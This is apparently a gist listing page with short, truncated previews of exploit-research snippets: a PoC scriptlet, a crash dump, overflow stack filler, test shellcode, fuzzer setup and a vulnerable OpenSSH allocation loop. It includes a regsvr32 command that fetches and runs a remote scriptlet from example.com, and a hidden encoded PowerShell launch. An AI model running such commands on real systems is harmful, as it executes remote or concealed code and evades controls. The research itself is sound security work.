This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | |
<!-- .sct files when downloaded, are executed from a path like this --> | |
<!-- Please Note, file extenstion does not matter --> | |
<!-- Though, the name and extension are arbitary.. --> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -NoP -sta -NonI -W hidden -Enc QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBJACAAYQBtACAAYgBlAGkAbgBnACAAZQB4AGUAYwB1AHQAZQBkACAAZgByAG8AbQAgAHQAaABlACAAbQBlAG0AbwByAHkAIABkAHUAaAAgACEAIQAnACkA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Table of Contents | |
0. Testing Environment | |
0.1 Testing Environment | |
1. Software Vulnerability Review |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0:005> r | |
eax=00000000 ebx=008adff0 ecx=008f00a7 edx=00000000 esi=02d8bb70 edi=00000000 | |
eip=7157b68f esp=02d8bb44 ebp=02d8bb5c iopl=0 nv up ei pl zr na pe nc | |
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 | |
mshtml!CElement::Doc+0x2: | |
7157b68f 8b5070 mov edx,dword ptr [eax+70h] ds:002b:00000070=???????? | |
0:005> u mshtml!CElement::Doc | |
mshtml!CElement::Doc: | |
7157b68d 8b01 mov eax,dword ptr [ecx] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0141E388 41414141 AAAA `<----------- ESP starts here` | |
0141E38C 41414141 AAAA | |
0141E390 41414141 AAAA | |
0141E394 41414141 AAAA | |
0141E398 41414141 AAAA | |
0141E39C 41414141 AAAA | |
0141E3A0 41414141 AAAA | |
0141E3A4 41414141 AAAA | |
0141E3A8 41414141 AAAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from capstone import * | |
shellcode = "\x00\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x01\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x02\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x03\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x04\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x05\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x06\x48\x8B\x01\xC3\xC3\xC3\xC3" | |
shellcode += "\x07\x48\x8B\x01\xC3\xC3\xC3\xC3" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
AutoComplete | |
class AutoComplete() :3 | |
def __init__() :5 | |
def complete() :8 | |
def complete() :20 | |
commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
how it was compiled | |
git clone https://github.com/googleprojectzero/winafl.git | |
git submodule update --init --recursive | |
mkdir build32 | |
cd build32 | |
cmake .. -DDynamoRIO_DIR=C:\Users\blackleitus\Desktop\DynamoRIO-Windows-7.1.0-1\cmake -DINTELPT=1 | |
cmake --build . --config Release | |
# crash at the moment of run this commmand |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
file_list = ["10.1.1.111.1781.pdf", "10.1.1.111.5264.pdf", "10.1.1.39.1596.pdf", "10.1.1.41.8589.pdf", "10.1.1.42.5619.pdf"] | |
apps = [ | |
"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/MacOS/AdobeReader", | |
"/Applications/Adobe Reader.app/Contents/MacOS/AdobeReader", | |
"/Applications/Preview.app/Contents/MacOS/Preview"] | |
fuzz_output = "fuzz.pdf" | |
FuzzFactor = 250 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nresp = packet_get_int(); | |
if (nresp > 0) { | |
response = xmalloc(nresp*sizeof(char*)); | |
for (i = 0; i < nresp; i++) | |
response[i] = packet_get_string(NULL); | |
} |
OlderNewer